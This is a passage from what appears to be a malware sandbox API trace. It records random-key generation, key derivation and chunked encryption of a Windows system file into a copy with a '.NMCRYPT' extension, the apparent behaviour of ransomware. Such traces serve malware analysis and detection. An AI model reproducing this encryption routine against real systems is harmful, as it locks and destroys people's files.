pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.374] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.374] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.375] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0148.375] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.375] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad438) returned 1 [0148.375] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.375] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.375] wcslen (_String="\\\\?\\") returned 0x4 [0148.375] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2f8) returned 1 [0148.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.375] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0148.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.376] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.377] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.377] GetLastError () returned 0x0 [0148.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.387] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.387] GetLastError () returned 0x0 [0148.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.387] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.387] GetLastError () returned 0x0 [0148.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.387] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.387] GetLastError () returned 0x0 [0148.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.387] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.387] GetLastError () returned 0x0 [0148.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.387] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.388] GetLastError () returned 0x0 [0148.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.388] GetLastError () returned 0x0 [0148.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.388] GetLastError () returned 0x0 [0148.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.388] GetLastError () returned 0x0 [0148.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.388] GetLastError () returned 0x0 [0148.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.388] GetLastError () returned 0x0 [0148.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.388] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.388] GetLastError () returned 0x0 [0148.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.389] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.389] GetLastError () returned 0x0 [0148.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.389] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.389] GetLastError () returned 0x0 [0148.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.389] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.389] GetLastError () returned 0x0 [0148.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.389] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.389] GetLastError () returned 0x0 [0148.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.390] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.390] GetLastError () returned 0x0 [0148.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.390] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.390] GetLastError () returned 0x0 [0148.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.390] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.390] GetLastError () returned 0x0 [0148.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.390] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, 